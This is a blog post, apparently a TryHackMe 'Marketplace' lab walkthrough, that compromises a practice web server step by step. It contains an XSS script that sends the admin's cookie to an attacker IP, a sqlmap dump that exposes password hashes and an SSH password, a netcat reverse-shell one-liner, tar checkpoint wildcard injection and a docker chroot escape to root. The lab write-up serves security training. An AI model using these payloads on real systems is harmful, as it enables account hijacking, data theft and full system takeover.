{"id":132579,"date":"2023-03-20T19:59:05","date_gmt":"2023-03-20T19:59:05","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1229072"},"modified":"2023-03-20T19:59:05","modified_gmt":"2023-03-20T19:59:05","slug":"tryhackme-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/03\/20\/tryhackme-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website\/","title":{"rendered":"[TryHackMe] Marketplace Walkthrough \u2013 How I Pulled Off a Cookie Heist to Become an Admin of the Target Website"},"content":{"rendered":"\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/marketplace\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/marketplace<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: flag 1, <code>user.txt<\/code>, <code>root.txt<\/code><\/li>\n<li><strong>Highlight<\/strong>: cookie thievery to become admin on a website<\/li>\n<li><strong>Tools<\/strong>: <code>cookie heist, sqlmap, docker<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>web, xss, docker, sqli, tar wildcard exploit<\/em><\/li>\n<\/ul>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a 
href=\"https:\/\/blog.finxter.com\/tryhackme-the-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FKx1CyqMBHUY%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>BACKGROUND<\/h2>\n<p>In this box, we are tasked with pen-testing an internal server to check for bugs before releasing it to the public. Judging by the tags on this box, we will execute some cross-site scripting and pull off a bit of SQL command injection. Let&#8217;s get started!<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"868\" height=\"343\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224.png\" alt=\"\" class=\"wp-image-1229085\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224.png 868w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224-300x119.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224-768x303.png 768w\" sizes=\"auto, (max-width: 868px) 100vw, 868px\" \/><\/figure>\n<h2>ENUMERATION\/RECON<\/h2>\n<p><code>export myIP=10.10.129.195<\/code><\/p>\n<p><code>export targetIP=10.10.163.156<\/code><\/p>\n<p class=\"has-base-2-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f4a1.png\" alt=\"\ud83d\udca1\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Info<\/strong>: The walkthrough video includes several target IPs because I had to switch to the in-browser attack box part of the way through. I&#8217;m not sure why, but my VPN VM had serious stability issues with the target IP.<\/p>\n<p>So far, we know that the sysadmin&#8217;s name is Michael. 
Maybe that will be a username.<\/p>\n<h2>NMAP RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"733\" height=\"456\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228.png\" alt=\"\" class=\"wp-image-1229109\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228.png 733w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228-300x187.png 300w\" sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -A -p- 10.10.28.52\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-03-02 08:33 EST\nStats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan\nConnect Scan Timing: About 10.33% done; ETC: 08:37 (0:04:03 remaining)\nNmap scan report for 10.10.28.52\nHost is up (0.085s latency).\nNot shown: 65533 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: | 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)\n| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)\n|_ 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)\n80\/tcp open http nginx 1.19.2\n| http-robots.txt: 1 disallowed entry |_\/admin\n|_http-server-header: nginx\/1.19.2\n|_http-title: The Marketplace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 238.51 seconds<\/pre>\n<h2>WALK THE WEBSITE<\/h2>\n<p>We gather that this website is a storefront with a login page. We can easily create a new user and post a new item. 
Let&#8217;s check if this new item might be able to run a script on the user who views it.<\/p>\n<h2>COMMAND INJECTION PROOF OF CONCEPT<\/h2>\n<p><code>&lt;script&gt;hello there&lt;\/script&gt;<\/code><\/p>\n<p>It works. Let&#8217;s use this to set up a script that will send us the admin&#8217;s cookie when they visit this item&#8217;s page.<\/p>\n<h2>USING COOKIE HEIST TO STEAL THE ADMIN&#8217;S COOKIE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"730\" height=\"569\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229.png\" alt=\"\" class=\"wp-image-1229118\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229.png 730w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229-300x234.png 300w\" sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/figure>\n<\/div>\n<p>To save a bit of time from scripting our own cookie-stealing program, let&#8217;s grab CookieHeist from the <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/tacticthreat\/CookieHeist\" data-type=\"URL\" data-id=\"https:\/\/github.com\/tacticthreat\/CookieHeist\" target=\"_blank\">Git repo<\/a>.<\/p>\n<p>Next, we\u2019ll set up a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a> with <code>python3<\/code> to serve the <code>cookieheist<\/code> PHP script<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -m http.server<\/pre>\n<p>And start our listener to catch the stolen cookie.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<p>Now that everything is in place, we can test our script by visiting the item\u2019s page. On our listener, we catch our own token. <\/p>\n<p>Now we will click on the <code>report item<\/code> button. The admin should visit the page soon and then our heist will hopefully work as planned and the admin\u2019s cookie will be sent to us on the listener.<\/p>\n<p>It worked! Let\u2019s copy the token value below. Next, we\u2019ll prepare to use <code>sqlmap<\/code> to dump the database.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"798\" height=\"191\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225.png\" alt=\"\" class=\"wp-image-1229092\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225.png 798w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225-300x72.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225-768x184.png 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/figure>\n<h2>SWAP THE COOKIES AND SWITCH TO ADMIN\u2019S ACCOUNT<\/h2>\n<p>In our firefox browser, we can now log into ben\u2019s account, and, in the developer tab, navigate to storage and cookies. 
Simply switch out the cookies and hit reload, and you will discover a new administration panel with users and our first flag!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"573\" height=\"382\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226.png\" alt=\"\" class=\"wp-image-1229093\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226.png 573w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226-300x200.png 300w\" sizes=\"auto, (max-width: 573px) 100vw, 573px\" \/><\/figure>\n<\/div>\n<h2>DUMP THE DATABASE WITH SQLMAP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"727\" height=\"486\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230.png\" alt=\"\" class=\"wp-image-1229120\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230.png 727w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230-300x201.png 300w\" sizes=\"auto, (max-width: 727px) 100vw, 727px\" \/><\/figure>\n<\/div>\n<p>Next let\u2019s do some local enumeration with <code>sqlmap<\/code>. 
We will use the admin\u2019s cookie again in our command.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sqlmap http:\/\/10.10.197.89\/admin?user=3 --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2Nzc4NTczMjN9.DcEFxcLEnU7NUtNJEseq70na-gkRdEXtqkOLhGzZxVU' --technique=U --delay=3 --dump<\/pre>\n<p>*The <code>--delay=3<\/code> option spaces out the requests so that the target\u2019s protections do not cut <code>sqlmap<\/code> off before it can extract anything.<\/p>\n<pre class=\"wp-block-preformatted\"><code> ___ __H__ ___ ___[(]_____ ___ ___ {1.6.11#stable}\n|_ -| . ['] | .'| . |\n|___|_ [\"]_|_|_|__,| _| |_|V... |_| https:\/\/sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:40:00 \/2023-03-03\/ Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y\/N] [05:40:12] [INFO] testing connection to the target URL\n[05:40:15] [INFO] checking if the target is protected by some kind of WAF\/IPS\n[05:40:21] [INFO] heuristic (basic) test shows that GET parameter 'user' might be injectable (possible DBMS: 'MySQL')\n[05:40:24] [INFO] testing for SQL injection on GET parameter 'user'\nit looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for o\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? 
[Y\/n] it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y\/n] [05:40:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'\n[05:41:02] [WARNING] reflective value(s) found and filtering out\n[05:41:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[05:41:20] [INFO] target URL appears to have 4 columns in query\n[05:42:12] [WARNING] there is a possibility that the target (or WAF\/IPS) is dropping 'suspicious' requests\n[05:42:12] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)\n[05:43:51] [CRITICAL] connection timed out to the target URL\n[05:43:57] [INFO] GET parameter 'user' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable\n[05:43:57] [INFO] checking if the injection point on GET parameter 'user' is a false positive sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:\n---\nParameter: user (GET) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: user=-5573 UNION ALL SELECT NULL,CONCAT(0x716a707871,0x736d5764774f6e48726c4a5579484373776c426e42494c6c58486379764f5a4a4d484e4f47546e53,0x71626a7071),NULL,NULL-- -\n---\n[05:47:20] [INFO] testing MySQL\n[05:47:23] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)\n[05:48:00] [INFO] confirming MySQL\n[05:48:06] [INFO] the back-end DBMS is MySQL\nweb application technology: Express, Nginx 1.19.2\nback-end DBMS: MySQL >= 8.0.0\n[05:48:21] [WARNING] missing database parameter. 
sqlmap is going to use the current database to enumerate table(s) entries\n[05:48:21] [INFO] fetching current database\n[05:48:24] [INFO] fetching tables for database: 'marketplace'\n[05:48:28] [INFO] fetching columns for table 'users' in database 'marketplace'\n[05:48:31] [INFO] fetching entries for table 'users' in database 'marketplace'\nDatabase: marketplace\nTable: users\n[4 entries]\n+----+--------------------------------------------------------------+----------+-----------------+\n| id | password | username | isAdministrator |\n+----+--------------------------------------------------------------+----------+-----------------+\n| 1 | $2b$10$83pRYaR\/d4ZWJVEex.lxu.Xs1a\/TNDBWIUmB4z.R0DT0MSGIGzsgW | system | 0 |\n| 2 | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf\/1q | michael | 1 |\n| 3 | $2b$10$\/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake | 1 |\n| 4 | $2b$10$UP9S8hhGQ4oam6K0iK35Ke.TLTN\/fXWhj\/Ak\/MvnkUw1XksDWH9py | ben | 0 |\n+----+--------------------------------------------------------------+----------+-----------------+ [05:48:34] [INFO] table 'marketplace.users' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/users.csv'\n[05:48:34] [INFO] fetching columns for table 'items' in database 'marketplace'\n[05:48:37] [INFO] fetching entries for table 'items' in database 'marketplace'\n[05:48:40] [INFO] recognized possible password hashes in column 'image'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y\/N] y\n[05:48:49] [INFO] writing hashes to a temporary file '\/tmp\/sqlmapsc6t_j_x87459\/sqlmaphashes-ro5_o25b.txt' do you want to crack them via a dictionary-based attack? 
[Y\/n\/q] n\nDatabase: marketplace\nTable: items\n[3 entries]\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+\n| id | image | title | author | description |\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+\n| 1 | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2 | Good as new. |\n| 2 | abffe546fb4cb740cc6b44f9e4c263df | A cactus | 3 | Yep, that's a cactus. |\n| 3 | 598815c0f5554115631a3250e5db1719 | &lt;script>document.location=\"http:\/\/10.6.2.23:8000\/cookiesteal-simple.php?c=\" + document.cookie&lt;\/script> | 4 | d |\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+ [05:48:59] [INFO] table 'marketplace.items' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/items.csv'\n[05:48:59] [INFO] fetching columns for table 'messages' in database 'marketplace'\n[05:49:02] [INFO] fetching entries for table 'messages' in database 'marketplace'\nDatabase: marketplace\nTable: messages\n[3 entries]\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| id | is_read | user_to | user_from | message_content |\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| 1 | 1 | 3 | 1 | <strong>Hello!\\r\\nAn automated system has detected your SSH password is too weak and needs to 
be changed. You have been generated a new temporary password.\\r\\nYour new password is: @b_ENXkGYUCAv3zJ<\/strong> |\n| 2 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |\n| 3 | 0 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ [05:49:05] [INFO] table 'marketplace.messages' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/messages.csv'\n[05:49:05] [WARNING] HTTP error codes detected during run:\n500 (Internal Server Error) - 10 times\n[05:49:05] [INFO] fetched data logged to text files under '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89' [*] ending @ 05:49:05 \/2023-03-03\/\n<\/code><\/pre>\n<p>The info in <strong>bold<\/strong> above shows credentials for jake (user 3). Let&#8217;s try using these credentials to log in via SSH. <code>jake:@b_ENXkGYUCAv3zJ<\/code><\/p>\n<h2>INITIAL FOOTHOLD<\/h2>\n<p>We are in as Jake! 
And we found the user flag!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"653\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227.png\" alt=\"\" class=\"wp-image-1229094\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227.png 530w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227-243x300.png 243w\" sizes=\"auto, (max-width: 530px) 100vw, 530px\" \/><\/figure>\n<\/div>\n<h2>LOCAL RECON<\/h2>\n<p>First, let&#8217;s check our sudo permissions with <code>sudo -l<\/code><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">jake@the-marketplace:\/home\/marketplace$ sudo -l\nMatching Defaults entries for jake on the-marketplace: env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin User jake may run the following commands on the-marketplace: (michael) NOPASSWD: \/opt\/backups\/backup.sh<\/pre>\n<p>Let&#8217;s try to switch users to <code>michael<\/code> by leveraging the file <code>backup.sh<\/code> and our special sudo permissions to run it as user <code>michael<\/code>. 
<\/p>\n<p>First let&#8217;s examine the code.<\/p>\n<p><code>jake@the-marketplace:\/opt\/backups$ cat backup.sh<\/code><\/p>\n<p>Output:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/bin\/bash\necho \"Backing up files...\";\ntar cf \/opt\/backups\/backup.tar *<\/pre>\n<\/p>\n<p>As we can see, the <code>backup.sh<\/code> script runs <code>tar<\/code> with a wildcard (<code>*<\/code>), so every file in the working directory is added to the archive. We can exploit this by creating empty files whose names look like <code>tar<\/code> command-line flags: the shell expands the wildcard into <code>tar<\/code>&#8217;s argument list, so <code>tar<\/code> treats those names as checkpoint options rather than as files to archive.<\/p>\n<h2>TARBALL WILDCARD EXPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"732\" height=\"486\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231.png\" alt=\"\" class=\"wp-image-1229122\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231.png 732w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231-300x199.png 300w\" sizes=\"auto, (max-width: 732px) 100vw, 732px\" \/><\/figure>\n<\/div>\n<ol>\n<li>First, let&#8217;s create a reverse shell and copy it to the <code>\/opt\/backups<\/code> directory.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"mkfifo \/tmp\/gdsio; nc 10.10.163.156 8888 0&lt;\/tmp\/gdsio | \/bin\/sh >\/tmp\/gdsio 2>&amp;1; rm \/tmp\/gdsio\" > shell.sh<\/pre>\n<ol start=\"2\">\n<li>Create an empty file instructing tar to run the <code>shell.sh<\/code> file.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"\" > \"--checkpoint-action=exec=sh shell.sh\"<\/pre>\n<ol start=\"3\">\n<li>Create a second empty file that makes tar reach checkpoint 1, which triggers the checkpoint action.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"\" > --checkpoint=1<\/pre>\n<ol start=\"4\">\n<li>Let&#8217;s set up a Netcat listener on our attack machine to grab the reverse shell.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<ol start=\"5\">\n<li>Activate the exploit by running <code>backup.sh<\/code> as user Michael with sudo, from the <code>\/opt\/backups<\/code> directory where the wildcard expands.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -u michael \/opt\/backups\/backup.sh<\/pre>\n<h2>EXPLOIT<\/h2>\n<p>MAKE USE OF THE GTFObins ALPINE EXPLOIT<\/p>\n<p>Now that we have caught the <strong>revshell<\/strong> as Michael, let&#8217;s poke around the filesystem a bit more. <\/p>\n<p>We can see that we are running docker. We&#8217;ll have to break out of the docker container in order to catch our root flag. 
GTFObins suggests leveraging alpine to escape the container.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"730\" height=\"487\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232.png\" alt=\"\" class=\"wp-image-1229127\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232.png 730w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232-300x200.png 300w\" sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/figure>\n<\/div>\n<p>In this box, the cookie-stealing technique showed how it is sometimes possible for malicious actors to gain quick access to another user&#8217;s or even an admin&#8217;s account on a website without even needing to know their password. 
<\/p>\n<p>To me, this was the most impressive take-away from the box.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: https:\/\/tryhackme.com\/room\/marketplace Difficulty: Medium Target: flag 1, user.txt, root.txt Highlight: cookie thievery to become admin on a website Tools: cookie heist, sqlmap, docker Tags: web, xss, docker, sqli, tar wildcard exploit BACKGROUND In this box, we are tasked with pen-testing an internal server to check for bugs before releasing [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-132579","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=132579"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132579\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=132579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=132579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=132579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}